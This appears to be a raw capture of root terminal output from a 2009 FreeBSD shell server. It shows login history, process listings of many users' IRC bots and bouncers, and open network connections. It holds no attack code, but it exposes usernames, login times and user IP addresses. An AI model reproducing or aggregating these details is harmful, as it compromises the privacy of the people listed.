+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 21:14 - 22:05  (00:50)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 21:07 - 21:14  (00:07)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 19:23 - 19:54  (00:31)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 18:36 - 18:36  (00:00)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 17:40 - 18:24  (00:43)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 17:12 - 17:37  (00:24)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 09:20 - 09:21  (00:01)
+pimpinjg         ttype    cpe-76-175-20-18 Mon Jun 22 08:45 - 09:19  (00:33)
+pimpinjg         ttype    cpe-76-175-20-18 Mon Jun 22 08:37 - 08:40  (00:02)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 08:30 - 08:49  (00:19)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 08:20 - 08:26  (00:05)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 08:17 - 08:18  (00:01)
+pimpinjg         ttype    cpe-76-175-20-18 Mon Jun 22 08:03 - 08:12  (00:08)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 08:01 - 08:03  (00:02)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 07:55 - 08:00  (00:04)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 07:43 - 07:55  (00:11)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 04:09 - 04:12  (00:03)
+pimpinjg         ttypf    cpe-76-175-20-18 Mon Jun 22 03:05 - 03:06  (00:00)
+pimpinjg         ttypd    cpe-76-175-20-18 Mon Jun 22 02:31 - 02:33  (00:01)
+pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 20:58 - 21:48  (00:50)
+pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 20:35 - 20:51  (00:16)
+pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 20:07 - 20:23  (00:16)
+pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 19:51 - 19:53  (00:01)
+pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 17:22 - 17:25  (00:03)
+pimpinjg         ttypd    cpe-76-175-20-18 Sun Jun 21 17:02 - 17:08  (00:06)
+pimpinjg         ttypd    cpe-76-175-20-18 Sat Jun 20 15:18 - 15:29  (00:10)
+pimpinjg         ttypd    cpe-76-175-20-18 Sat Jun 20 02:13 - 02:14  (00:00)
+pimpinjg         ttypd    76.175.20.182    Fri Jun 19 20:41 - 20:43  (00:01)
+pimpinjg         ttypf    cpe-76-175-20-18 Thu Jun 18 22:53 - 22:57  (00:04)
+pimpinjg         ttyp2    cpe-76-175-20-18 Thu Jun 18 05:11 - 05:12  (00:01)
+pimpinjg         ttyp2    cpe-76-175-20-18 Thu Jun 18 04:53 - 05:07  (00:14)
+pimpinjg         ttyp2    cpe-76-175-20-18 Thu Jun 18 04:42 - 04:42  (00:00)
+pimpinjg         ttypd    cpe-76-175-20-18 Thu Jun 18 04:28 - 04:41  (00:12)
+pimpinjg         ttypd    cpe-76-175-20-18 Thu Jun 18 02:03 - 02:44  (00:41)
+pimpinjg         ttypd    cpe-76-175-20-18 Wed Jun 17 21:10 - 21:52  (00:42)
+pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:37 - 19:37  (00:00)
+pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:30 - 19:37  (00:06)
+pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:29 - 19:30  (00:00)
+pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:27 - 19:29  (00:01)
+pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:27 - 19:27  (00:00)
+pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:25 - 19:26  (00:00)
+pimpinjg         ttype    cpe-76-175-20-18 Wed Jun 17 19:23 - 19:25  (00:01)
+
+wtmp begins Mon Jun  1 06:20:11 CDT 2009
+[root@velocity:~]# 
+
+[root@velocity:~]# ps -aux | grep romeo
+root       60582  0.0  0.2  5400  2036  ??  Is    3:32AM   0:00.16 sshd: romeo [priv] (sshd)
+romeo      60584  0.0  0.2  5384  2088  ??  S     3:32AM   0:01.47 sshd:  (sshd)
+romeo      51236  0.0  0.2  3268  1836  p0  Is   11:50PM   0:00.03 /usr/local/bin/bash
+romeo      51241  0.0  0.6  9296  6136  p0  S+   11:50PM   0:10.95 irssi -h absolute.ownage.net
+romeo      60586  0.0  0.2  3244  1900  p2  Is    3:32AM   0:00.04 -bash (bash)
+romeo      62761  0.0  0.1  2040  1448  p2  S+    4:25AM   0:00.04 screen -r
+
+[root@velocity:~]# lsof -i -n | grep romeo
+irssi     51241      romeo    3u  IPv4 0xca130740      0t0  TCP 72.20.28.205:61626->71.6.199.68:ircd (ESTABLISHED)
+irssi     51241      romeo    4u  IPv4 0xc58c4740      0t0  TCP 72.20.28.205:53292->66.225.223.70:ircd (ESTABLISHED)
+irssi     51241      romeo    7u  IPv4 0xca04a1d0      0t0  TCP 72.20.28.205:62094->94.102.58.212:ircd (ESTABLISHED)
+sshd      60584      romeo    3u  IPv4 0xc9e971d0      0t0  TCP 72.20.28.248:ssh->188.49.23.137:28098 (ESTABLISHED)
+[root@velocity:~]# 
+
+root@velocity:/var/run]# ps -auxwww
+USER         PID %CPU %MEM   VSZ   RSS  TT  STAT STARTED      TIME COMMAND
+root          10 83.0  0.0     0     8  ??  RL   27Jan08 534762:26.98 [idle]
+lyhne1     85085 11.3  0.3 10700  3096  ??  S    11May09 1274:26.14 /home/lyhne1/services/services
+root           0  0.0  0.0     0     0  ??  WLs  27Jan08   0:00.08 [swapper]
+root           1  0.0  0.0   772    80  ??  ILs  27Jan08  21:20.52 /sbin/init --
+root           2  0.0  0.0     0     8  ??  DL   27Jan08  38:47.98 [g_event]
+root           3  0.0  0.0     0     8  ??  DL   27Jan08 187:53.55 [g_up]
+root           4  0.0  0.0     0     8  ??  DL   27Jan08 141:20.71 [g_down]
+root           5  0.0  0.0     0     8  ??  DL   27Jan08   0:00.00 [kqueue taskq]
+root           6  0.0  0.0     0     8  ??  DL   27Jan08   0:00.01 [thread taskq]
+root           7  0.0  0.0     0     8  ??  DL   27Jan08   0:00.00 [acpi_task_0]
+root           8  0.0  0.0     0     8  ??  DL   27Jan08   0:00.00 [acpi_task_1]
+root           9  0.0  0.0     0     8  ??  DL   27Jan08   0:00.00 [acpi_task_2]
+root          11  0.0  0.0     0     8  ??  WL   27Jan08 3371:26.93 [swi4: clock sio]
+root          12  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [swi3: vm]
+root          13  0.0  0.0     0     8  ??  WL   27Jan08 6365:16.77 [swi1: net]
+root          14  0.0  0.0     0     8  ??  DL   27Jan08 557:44.26 [yarrow]
+root          15  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [swi6: task queue]
+root          16  0.0  0.0     0     8  ??  WL   27Jan08   0:00.01 [swi6: Giant taskq]
+root          17  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [swi5: +]
+root          18  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [swi2: cambio]
+root          19  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [irq9: acpi0]
+root          20  0.0  0.0     0     8  ??  WL   27Jan08 5058:47.37 [irq16: bge0]
+root          21  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [irq21: uhci0 ehci0]
+root          22  0.0  0.0     0     8  ??  DL   27Jan08   0:02.22 [usb0]
+root          23  0.0  0.0     0     8  ??  DL   27Jan08   0:00.00 [usbtask]
+root          24  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [irq22: uhci1]
+root          25  0.0  0.0     0     8  ??  DL   27Jan08   0:02.68 [usb1]
+root          26  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [irq18: uhci2]
+root          27  0.0  0.0     0     8  ??  DL   27Jan08   0:01.99 [usb2]
+root          28  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [irq23: uhci3]
+root          29  0.0  0.0     0     8  ??  DL   27Jan08   0:02.09 [usb3]
+root          30  0.0  0.0     0     8  ??  DL   27Jan08   0:02.34 [usb4]
+root          31  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [irq14: ata0]
+root          32  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [irq15: ata1]
+root          33  0.0  0.0     0     8  ??  WL   27Jan08 149:12.28 [irq20: atapci1]
+root          34  0.0  0.0     0     8  ??  WL   27Jan08   0:00.60 [irq1: atkbd0]
+root          35  0.0  0.0     0     8  ??  WL   27Jan08   0:00.00 [swi0: sio]
+root          36  0.0  0.0     0     8  ??  DL   27Jan08  15:56.90 [pagedaemon]
+root          37  0.0  0.0     0     8  ??  DL   27Jan08   0:01.89 [vmdaemon]
+root          38  0.0  0.0     0     8  ??  DL   27Jan08  98:08.61 [pagezero]
+root          39  0.0  0.0     0     8  ??  DL   27Jan08   3:59.11 [bufdaemon]
+root          40  0.0  0.0     0     8  ??  DL   27Jan08 519:04.35 [syncer]
+root          41  0.0  0.0     0     8  ??  DL   27Jan08   5:03.46 [vnlru]
+root          42  0.0  0.0     0     8  ??  DL   27Jan08  56:44.12 [softdepflush]
+root          43  0.0  0.0     0     8  ??  DL   27Jan08  96:57.63 [schedcpu]
+root         753  0.0  0.0   528     0  ??  IWs  -         0:00.00 /sbin/devd
+root         808  0.0  0.0  1376   368  ??  Ss   27Jan08  29:30.11 /usr/sbin/syslogd -s
+root         905  0.0  0.0  1288   108  ??  Ss   27Jan08   0:38.65 /usr/sbin/usbd
+nobody       921  0.0  0.1  2368   644  ??  Ss   27Jan08  10:21.51 proftpd: (accepting connections) (proftpd)
+root         973  0.0  0.0  1444   344  ??  Is   27Jan08   9:25.16 /usr/sbin/cron -s
+nodex       1211  0.0  0.1  4892   620  ??  S    27Jan08   2:16.48 ./services
+nodex       1219  0.0  0.1  3408   796  ??  S    27Jan08  20:22.77 ircd: irc.nodexirc.net (ircd)
+crazyl      1230  0.0  0.2  3484  1896  ??  S    27Jan08  62:45.21 ./eggdrop ApocBot.conf (eggdrop-1.6.18)
+crazyl      1241  0.0  0.2  3952  2400  ??  S    27Jan08  93:52.56 ./eggdrop Hibben.conf (eggdrop-1.6.18)
+crazyl      1248  0.0  0.2  4128  2352  ??  S    27Jan08  96:56.14 ./eggdrop CLBot.conf (eggdrop-1.6.18)
+root        2937  0.0  0.0  1408   204  ??  Is   27Jan08   2:15.57 oidentd
+ioplex      4479  0.0  0.2  5228  1608  ??  Ss   10Jun09   2:15.27 ./psybnc conf
+roodyk      7496  0.0  0.0  4512   496  ??  Ss   26Apr09   0:34.85 ./sbnc
+roodyk      7497  0.0  0.2  7760  2416  ??  S    26Apr09   2:06.67 ./sbnc --rpc-child
+bluewish    8293  0.0  0.1  1580   524  ??  Ss   31Mar09   3:18.90 ./energymech
+skypilot   11073  0.0  0.0  1508     0  ??  IWs  -         0:00.00 ./bnc
+ste        12145  0.0  0.2  3936  2368  ??  Ss   15Jun09   6:32.39 /usr/home/ste/bsd mob
+ste        12182  0.0  0.2  4960  2556  ??  Ss   15Jun09   7:31.60 /usr/home/ste/bsd player
+lordy      12679  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
+lordy      12680  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
+lordy      12682  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
+lordy      12683  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
+lordy      12684  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
+lordy      12685  0.0  0.0     0     0  ??  Z    13Jun09   0:00.01 
+lordy      12686  0.0  0.0     0     0  ??  Z    13Jun09   0:00.01 
+lordy      12687  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
+lordy      12689  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
+lordy      12690  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
+lordy      12691  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
+lordy      12692  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
+lordy      12695  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
+lordy      12696  0.0  0.0     0     0  ??  Z    13Jun09   0:00.00 
+lordy      12697  0.0  0.0     0     0  ??  Z    13Jun09   0:00.01 
+lordy      12701  0.0  0.0     0     0  ??  Z    13Jun09   0:00.01 
+crrj13     15843  0.0  0.3  5508  2696  ??  S    28Apr09   3:57.42 ircd: lambda.bitsjointirc.net (ircd)
+daali      18199  0.0  0.0  2888     0  ??  IWs  -         0:00.00 ./bnc bnc.conf
+daali      18620  0.0  0.0  2716     0  ??  IWs  -         0:00.00 ./bnc bnc.conf
+scouse     19191  0.0  0.1  2956  1152  ??  S    27Nov08 825:22.21 ircd: irc.toughsociety.com (ircd)
+scouse     19383  0.0  0.1  7296   676  ??  S    27Nov08   0:46.99 ./services -logchan
+root       21928  0.0  0.2  5476  2020  ??  Is    9:10PM   0:00.07 sshd:  (sshd)
+root       22109  0.0  0.2  5344  2024  ??  Ss    9:15PM   0:00.09 sshd:  (sshd)
+blotch     22806  0.0  1.2 18352 12200  ??  Ss   10Dec08 4616:08.79 /usr/home/blotch/inspircd/bin/inspircd
+shoes      25037  0.0  0.2  5092  2132  ??  S    23Sep08 156:12.96 ./eggdrop ./bot.conf (eggdrop-1.6.19)
+shoes      25039  0.0  0.2  5152  2160  ??  S    23Sep08 153:40.81 ./eggdrop ./bot.conf (eggdrop-1.6.19)
+crazyl     25232  0.0  0.3  4344  2676  ??  S    31Jan09  28:34.31 ./eggdrop cx4storm.conf (eggdrop-1.6.18)
+narcissu   26686  0.0  0.1  4740  1452  ??  S    11Mar08  22:41.05 ircd: beta.pseud0.net (ircd)
+smash      26960  0.0  0.2 12128  2032  ??  Ss    9Nov08 147:51.60 /usr/home/smash/wraith/wraith iridium
+blake96    27902  0.0  0.2  3344  1924  ??  S     8Nov08  23:08.58 ./eggdrop eggdrop.conf (eggdrop-1.6.19)
+lyhne1     29482  0.0  0.1  1448   700  ??  S     2Jan09 134:02.80 ./bopm
+chrirc     33440  0.0  0.1  3520   776  ??  S    12Jun08  15:34.94 ircd: irc.ChristianIRC.net (ircd)
+yaquis     43784  0.0  0.1  1520   736  ??  Ss   12Jun09   0:02.72 ./bnc
+devil      43953  0.0  0.1  1592   620  ??  Ss    6Jul08  75:48.71 ./energymech
+smash      44333  0.0  0.2  3936  1920  ??  Ss    5May09  22:54.47 /usr/home/smash/wraith/wraith fpck
+ltootle    48390  0.0  0.2  7040  2456  ??  S    26Jun08 935:23.47 ircd: RedWolf.Wolfpac.Org (ircd)
+root       51233  0.0  0.2  2268  1784  ??  Ss   11:50PM   0:07.93 screen
+lordy      51655  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 
+lordy      51656  0.0  0.0     0     0  ??  Z     8Jun09   0:00.01 
+lordy      51657  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 
+lordy      51658  0.0  0.0     0     0  ??  Z     8Jun09   0:00.01 
+lordy      51659  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 
+lordy      51660  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 
+lordy      51661  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 
+lordy      51662  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 
+lordy      51663  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 
+lordy      51664  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 
+lordy      51665  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 
+lordy      51668  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 
+lordy      51669  0.0  0.0     0     0  ??  Z     8Jun09   0:00.00 
+y2j        53333  0.0  0.2  3296  1680  ??  S    22May09   4:05.27 ./psybnc
+y2j        53335  0.0  0.3  4796  2992  ??  S    22May09   6:11.27 ./eggdrop IcEMaN.conf (eggdrop-1.6.17)
+y2j        53336  0.0  0.4  6032  3608  ??  S    22May09   7:22.14 ./eggdrop SioN.conf (eggdrop-1.6.17)
+ltootle    54810  0.0  0.1  8336   992  ??  S    26Jun08  24:35.00 ./services
+bruhaha    59704  0.0  0.0  1528     0  ??  IWs  -         0:00.00 ./bnc
+root       60582  0.0  0.2  5400  2036  ??  Is    3:32AM   0:00.60 sshd: romeo [priv] (sshd)
+romeo      60584  0.0  0.2  5384  2088  ??  S     3:32AM   0:09.86 sshd:  (sshd)
+root       63283  0.0  0.2  2332  1828  ??  Is   Wed10PM   0:01.12 screen
+root       64492  0.0  0.1  2772   604  ??  Is   17Jun09   4:12.85 /usr/sbin/sshd
+bruhaha    67858  0.0  0.1  1544   616  ??  Ss   23Aug08  17:43.63 ./bnc
+bruhaha    70843  0.0  0.0  1516     0  ??  IWs  -         0:00.00 ./bnc
+dealer     78536  0.0  0.1  8176  1316  ??  S    14Mar09 220:01.22 php dealbot.php
+own3d      82309  0.0  0.1  2820   728  ??  Is   15Oct08   3:35.17 ./sbnc
+lymelyte   88242  0.0  0.2  7720  2084  ??  Ss   29Mar09   4:33.70 ./epona
+poolboy    89012  0.0  0.4  5752  3984  ??  S     8Feb09 320:59.08 ./eggdrop CAP0.conf (eggdrop-1.6.17)
+redrum     91676  0.0  0.0  1280     0  ??  IW   -         0:00.00 tail -f /home/redrum/Unreal3.2/ircd.log
+redrum     91678  0.0  0.0  1280     0  ??  IW   -         0:00.00 tail -f /home/redrum/Unreal3.2/ircd.log
+redrum     91682  0.0  0.0  1280     0  ??  IW   -         0:00.00 tail -f /home/redrum/Unreal3.2/ircd.log
+root       92538  0.0  0.0     0     8  ??  DL   Thu08AM   0:00.08 [accounting]
+root       93821  0.0  0.1  1436   844  ??  Is   Thu08AM   0:00.00 inetd
+root       98040  0.0  0.2  5368  2016  ??  Is    4:35PM   0:00.04 sshd: ioplex [priv] (sshd)
+ioplex     98044  0.0  0.4  7364  4052  ??  I     4:35PM   0:02.03 sshd: ioplex (sshd)
+crazie     98542  0.0  0.4  9732  3884  ??  S    19May09  36:58.07 ./l
+crazie     98871  0.0  0.3  9236  3152  ??  S    19May09  13:26.08 ./mb2
+crazie     99303  0.0  0.2  7512  2324  ??  S    19May09   7:43.22 ./mb6
+root        1033  0.0  0.0  1344     0  v0  IWs+ -         0:00.00 /usr/libexec/getty Pc ttyv0
+root        1034  0.0  0.0  1344     0  v1  IWs+ -         0:00.00 /usr/libexec/getty Pc ttyv1
+root        1035  0.0  0.0  1344     0  v2  IWs+ -         0:00.00 /usr/libexec/getty Pc ttyv2
+root        1036  0.0  0.0  1344     0  v3  IWs+ -         0:00.00 /usr/libexec/getty Pc ttyv3
+root        1037  0.0  0.0  1344     0  v4  IWs+ -         0:00.00 /usr/libexec/getty Pc ttyv4
+root        1038  0.0  0.0  1344     0  v5  IWs+ -         0:00.00 /usr/libexec/getty Pc ttyv5
+root        1039  0.0  0.0  1344     0  v6  IWs+ -         0:00.00 /usr/libexec/getty Pc ttyv6
+root        1040  0.0  0.0  1344     0  v7  IWs+ -         0:00.00 /usr/libexec/getty Pc ttyv7
+darien9     2420  0.0  0.1 114060  1208  p0- S    16Mar08 799:19.15 ./psybnc
+manboo      9260  0.0  0.1  3676   924  p0- S    22Apr08  20:51.79 ircd: irc.thederka.com (ircd)
+manboo     11135  0.0  0.1  4288   620  p0- S    22Apr08   4:36.07 ./services
+ac1115     21918  0.0  0.1 21512  1200  p0- S     2Jul08  15:39.60 ./psybnc
+devil      22201  0.0  0.2 21412  1712  p0- S     2Nov08  46:45.70 ./psybnc
+bpunux     27500  0.0  0.1  9476  1136  p0- S    31Oct08   9:22.64 ./psybnc
+bpunux     28911  0.0  0.1  3068   976  p0- S    31Oct08   6:58.93 ./psybnc
+tarawa     33111  0.0  0.3 29660  2640  p0- S    14Mar08 106:21.81 ./psybnc
+reznik     33517  0.0  0.1 40788  1268  p0- S    27Apr08  44:00.81 ./psybnc
+genosyde   34316  0.0  0.1  3192  1464  p0- S     5Jun08  39:10.11 ./eggdrop -m (eggdrop-1.6.18)
+chrirc     40199  0.0  0.1  4248   628  p0- S    12Jun08   3:50.57 ./services
+vamp       44090  0.0  0.2  3936  2464  p0- S    27Jan08 103:08.26 ./eggdrop guanoapes.conf (eggdrop-1.6.15)
+vamp       44142  0.0  0.2  8352  2400  p0- S    27Jan08 102:58.38 ./eggdrop phante.conf (eggdrop-1.6.15)
+vamp       44170  0.0  0.2  3720  2120  p0- S    27Jan08  93:42.97 ./eggdrop bengal.conf (eggdrop-1.6.15)
+darien9    46897  0.0  0.1 84316  1384  p0- S     1Apr08 1518:35.73 ./psybnc
+romeo      51236  0.0  0.2  3268  1836  p0  Is   11:50PM   0:00.03 /usr/local/bin/bash
+romeo      51241  0.0  0.7  9932  6740  p0  S+   11:50PM   0:34.89 irssi -h absolute.ownage.net
+burnt      59824  0.0  0.3  5952  3156  p0- S    27Jan08  54:17.27 ircd: wasted.ufc-pride.org (ircd)
+burnt      59989  0.0  0.1  9012  1108  p0- S    27Jan08   5:52.73 ./services
+sharpie    63388  0.0  0.2  3908  2172  p0- S    27Jan08  61:39.10 ./eggdrop egg (eggdrop-1.6.15)
+daali      79885  0.0  0.3  5032  2656  p0- S    28Jan08  55:47.60 ./eggdrop (eggdrop-1.6.18)
+darkevil   84286  0.0  0.1  3868   704  p0- S    25Mar08  17:04.32 ircd: irc.darkquest.org (ircd)
+sharpie    95504  0.0  0.2  3812  2140  p0- S    25Apr08  53:07.90 ./eggdrop sun (eggdrop-1.6.15)
+sharpie    95593  0.0  0.2  3708  2148  p0- S    25Apr08  51:59.24 ./eggdrop spank (eggdrop-1.6.15)
+root       22120  0.0  0.2  3220  1888  p1  Ss    9:16PM   0:00.03 -bash (bash)
+root       22827  0.0  0.1  1648   980  p1  R+    9:32PM   0:00.00 ps -auxwww
+dark        3869  0.0  0.2 31228  2488  p2- S    22Apr09  11:35.44 ./psybnc
+romeo       4433  0.0  0.1  2040  1448  p2  S+    7:09PM   0:00.04 screen -r
+mooo       10652  0.0  0.2 41984  2284  p2- S    21May09  11:44.09 ./psybnc
+tlm        11616  0.0  0.2 27520  1788  p2- S    26Apr09   4:20.44 ./psybnc
+vamp       18167  0.0  0.1 29116  1320  p2- S     5Apr08  23:34.92 ./psybnc
+wchan21    29220  0.0  0.2 10628  2024  p2- S    30Apr09   7:46.46 ./psybnc psybnc.conf
+mimik0r    29613  0.0  0.2  5176  2248  p2- S    30May09   3:56.60 ./eggdrop eggdrop.conf (eggdrop-1.6.19)
+psycoz     29853  0.0  0.1  3248  1404  p2- S     7Jun09   1:13.18 ./psybnc
+zeepysea   33510  0.0  0.1  1424   620  p2- S    20Mar08 291:26.11 ./bopm
+lordy      33773  0.0  0.1  6120  1468  p2- S    30May09 440:58.20 ./bot
+lordy      33777  0.0  0.1  3848   944  p2- S    30May09 360:11.97 ./bot
+lordy      33783  0.0  0.2  7468  1684  p2- S    30May09 444:16.39 ./bot
+lordy      33807  0.0  0.1  4696  1024  p2- S    30May09 439:42.64 ./bot
+lordy      33811  0.0  0.1  5784  1088  p2- S    30May09 443:07.55 ./bot
+narcissu   34556  0.0  0.1 136368   564  p2- S    20Feb08  38:20.52 ./psybnc
+cmm        37284  0.0  0.2 22500  1724  p2- S    13Apr09   6:35.61 ./psybncD
+devil      43929  0.0  0.2 15176  2316  p2- S    22May09   8:40.13 sshd
+yaquis     47275  0.0  0.2  2976  1680  p2- S     6Jun09   1:51.67 ./eggdrop -m simple.conf (eggdrop-1.6.15)
+chaos1     48442  0.0  0.3  3400  2812  p2- S    10:44PM   0:07.40 ircd: irc.sonicanime.net (ircd)
+chaos1     48822  0.0  0.7  8296  7116  p2- S    10:52PM   0:01.09 /home/chaos1/core/anope/host/services
+chaos1     49843  0.0  0.6  7060  6444  p2- S    11:19PM   1:36.17 /home/chaos1/core/eggdrop/eggdrop ./run.eggdrop (eggdrop-1.6.19)
+tarawa     51960  0.0  3.6 82452 36732  p2- S    17May09  10:36.81 ./eggdrop Asurada.conf (eggdrop-1.6.19)
+yaquis     52945  0.0  0.1  1432   960  p2- S    12:31AM   0:48.93 ./bopm
+mlh        54757  0.0  0.2  3620  2108  p2- S     8Apr09   8:18.74 ./eggdrop a.conf (eggdrop-1.6.19)
+safety     59083  0.0  0.2  3316  1752  p2- S    22May09   1:49.86 ./psybnc
+brosco     59827  0.0  0.2  3912  2532  p2- S     1Jun09   3:41.68 ./eggdrop iphoney.conf (eggdrop-1.6.19)
+romeo      60586  0.0  0.2  3244  1900  p2  Is    3:32AM   0:00.05 -bash (bash)
+cpu        60695  0.0  0.2 12308  1880  p2- S    22May09   2:16.63 ./gramicci
+bollox     61265  0.0  0.2  3556  2068  p2- S     1May09   5:46.65 ./eggdrop Prolapse.conf (eggdrop-1.6.18)
+dealer     74736  0.0  0.2  3180  1636  p2- S     8Apr09   6:58.53 ./eggdrop eggdrop.conf (eggdrop-1.6.19)
+ircjaymz   75110  0.0  0.1 10012  1220  p2- S    18Mar08  24:56.65 ircd: ircdt.com (ircd)
+redrum     80211  0.0  0.6  9244  6144  p2- S     9Jun09   9:12.34 ./eggdrop (eggdrop-1.6.19)
+redrum     80260  0.0  0.6  6868  5764  p2- S     9Jun09   2:38.87 ./eggdrop ald.conf (eggdrop-1.6.19)
+bollox     80752  0.0  0.2  3812  2152  p2- S     7Apr09   8:30.62 ./eggdrop Cerebrum.conf (eggdrop-1.6.18)
+cazz1961   81636  0.0  0.2  3236  1784  p2- S     8May09  11:18.66 ./eggdrop voicer.conf (eggdrop-1.6.19)
+poolboy    85768  0.0  2.3 38696 23352  p2- S    13Jun09 344:08.61 ./eggdrop PlaTaNo.conf (eggdrop-1.6.17)
+qfx        85944  0.0  0.2  3592  2016  p2- S    10Jun09   0:53.81 ./psybnc
+tarawa     88344  0.0  3.0 31980 30444  p2- S    26May09   5:41.99 ./eggdrop Rasetsu.conf (eggdrop-1.6.19)
+bollox     90551  0.0  0.3  4188  2616  p2- S    10Jun09   4:03.14 ./psybnc
+darien9      363  0.0  0.1 126420  1276  p3- S     6Mar08 967:34.73 ./psybnc
+sysc        3001  0.0  0.1 53544  1492  p3- S    27Jan08  28:52.73 ./psybnc
+sqd        15833  0.0  0.1 19444  1436  p3- S     4Aug08  27:53.54 ./psybnc
+crazyl     37528  0.0  0.1 20120  1464  p3- S    27Nov08   8:58.67 ./psybnc
+en0prcv    58418  0.0  0.1 67988  1228  p3- S     4Apr08  97:19.44 ./psybnc
+skypilot   65653  0.0  0.0  7460   388  p3- S    19Nov08   2:43.71 /home/skypilot/NeoStats3.0//bin/neostats
+chevym4n    6472  0.0  0.1  5156   772  p4- S    27Jan08  17:56.69 ircd: pdev.SummitIRC.com (ircd)
+cpu        10289  0.0  0.2 27016  2152  p4- S    14Apr09   5:33.20 ./subdue
+cpu        10303  0.0  0.2 24588  1896  p4- S    14Apr09   4:56.34 ./arc
+oby1       18390  0.0  0.1 103980  1392  p4- S     8Oct08  37:31.06 ./psybnc
+skypilot   43173  0.0  0.1  5612   968  p4- S     3Nov08  10:41.95 ircd: Stinger.SkyzNet.Net (ircd)
+cmm        60721  0.0  0.3 100744  3488  p4- S    10Apr09  50:30.96 ./psybncC
+cmm        60933  0.0  0.3 31732  2888  p4- S    10Apr09  26:32.93 ./psybncB
+cmm        61190  0.0  0.2 26200  2420  p4- S    10Apr09  14:16.41 ./psybncR
+pimpinjg   63286  0.0  0.2  3268  1776  p4  Is   Wed10PM   0:00.03 /usr/local/bin/bash
+pimpinjg   63289  0.0  0.9 12636  9372  p4  S+   Wed10PM   1:16.45 irssi -h 72.20.28.217
+darien9    74450  0.0  0.2 38220  2084  p4- S    31Oct08 107:35.62 ./psybnc
+digitalman 97383  0.0  0.2 12644  2436  p4- S    20May09   6:43.68 ./psybnc psybnc.conf
+chevym4n   11847  0.0  0.1  5892   756  p6- S    25Oct08  13:16.82 ircd: irc.SummitIRC.com (ircd)
+crrj13     60894  0.0  0.4 14816  4384  p6- S     6May09   1:41.02 /home/crrj13/NeoStats3.0//bin/neostats
+lynx       71244  0.0  0.1 15292  1164  p6- S    27Aug08  13:54.41 ./psybnc
+yaquis     81249  0.0  0.2  2952  1664  p6- S     5Jun09   2:01.94 ./eggdrop -m simple.conf (eggdrop-1.6.15)
+yaquis     81862  0.0  5.6 58788 57552  p6- S    13Jun09 119:13.68 ircd: coke.accesox.net (ircd)
+darien9    95226  0.0  0.1  7876  1096  p6- S    23Jul08  20:45.03 ./psybnc
+baxxta     95367  0.0  0.1  8020  1144  p6- S    22Jul08  13:11.93 ./psybnc
+yaquis     98909  0.0  0.1  3140  1312  p6- S    30May09   1:26.70 ./psybnc
+nardi      18637  0.0  0.1  1480   680  p7- S    10Mar09  33:41.69 ./bopm
+crash      29763  0.0  0.3 32276  3504  p7- S    30Jan09 164:54.34 ./psybnc1
+mlh        52784  0.0  0.3  4584  3340  p7- S    10Jan09  22:48.64 ./eggdrop eggdrop.conf (eggdrop-1.6.19)
+nyakz      54517  0.0  0.2 30984  2448  p7- S    13Mar09  52:56.09 ./psybnc
+nardi      76675  0.0  0.1  5024   912  p7- S     8Feb09   7:16.69 ircd: Java.Albworld.Net (ircd)
+sqd        77187  0.0  0.2  3352  1584  p7- S    21Jan09  13:05.79 ./eggdrop simple.conf (eggdrop-1.6.19)
+darkuno3   77376  0.0  0.1  3400   792  p7- S    10Mar09   4:06.45 ircd: 72.20.28.219 (ircd)
